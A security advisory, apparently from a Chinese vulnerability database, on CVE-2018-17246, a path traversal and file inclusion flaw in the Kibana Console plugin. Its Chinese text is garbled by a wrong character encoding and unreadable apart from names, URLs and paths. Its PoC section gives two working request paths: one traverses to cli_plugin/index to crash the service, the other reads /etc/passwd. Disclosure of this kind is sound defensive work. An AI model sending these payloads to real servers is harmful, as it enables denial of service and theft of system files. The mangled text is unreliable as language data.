Elasticsearch Kibana Console²å¼þºÅÁîÖ´Ðзì϶°²È«¹«¸æ
°ä²¼¹¦·ò 2018-12-20·ì϶±àºÅºÍ¼¶±ð
CVE±àºÅ£ºCVE-2018-17246£¬Î£ÏÕ¼¶±ð£ºÖÐΣ£¬CVSS·ÖÖµ£º³§ÉÌ×ÔÆÀ 6.3£¬¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
ElasticSearch Kibana <6.4.3
ElasticSearch Kibana <5.6.13
·ì϶¸ÅÊö
Elasticsearch Kibana£¨Ç°³Æelasticsearch-dashboard£©ÊǺÉÀ¼Elasticsearch¹«Ë¾µÄÒ»Ì׿ªÔ´µÄ¡¢»ùÓÚä¯ÀÀÆ÷µÄ·ÖÎöºÍËÑË÷ElasticsearchÒDZí°å¹¤¾ß¡£ConsoleÊÇÆäÖеÄÒ»¸ö½ÚÔį̀²å¼þ¡£
Elasticsearch Kibana 6.4.3֮ǰ°æ±¾ºÍ5.6.13֮ǰ°æ±¾ÖеÄConsole²å¼þ´æÔÚ°²È«·ì϶¡£¹¥»÷Õß¿Éͨ¹ý·¢ËÍÒªÇóÀûÓø÷ì϶ÔÚÖ÷»ú²Ù×÷ϵͳÉÏÒÔKibana¹ý³ÌȨÏÞÖ´ÐÐËÁÒâºÅÁî¡£
Ó°ÏìÁìÓò
·ì϶ÑéÖ¤
POC/EXP£º
»Ø¾ø·þÎñ£¬¹¥»÷ÏòÁ¿ÈçÏ£º
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../cli_plugin/index
ËÁÒâÎļþ¶ÁÈ¡£¬¹¥»÷ÏòÁ¿ÈçÏ£º
/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
½¨¸´½¨Òé
Ŀǰ³§ÉÌÒѰ䲼Éý¼¶²¹¶¡ÒÔ½¨¸´·ì϶£¬²¹¶¡»ñÈ¡Á´½Ó:
https://access.redhat.com/security/cve/cve-2018-17246
²Î¿¼Á´½Ó
https://access.redhat.com/security/cve/cve-2018-17246
http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907


¾©¹«Íø°²±¸11010802024551ºÅ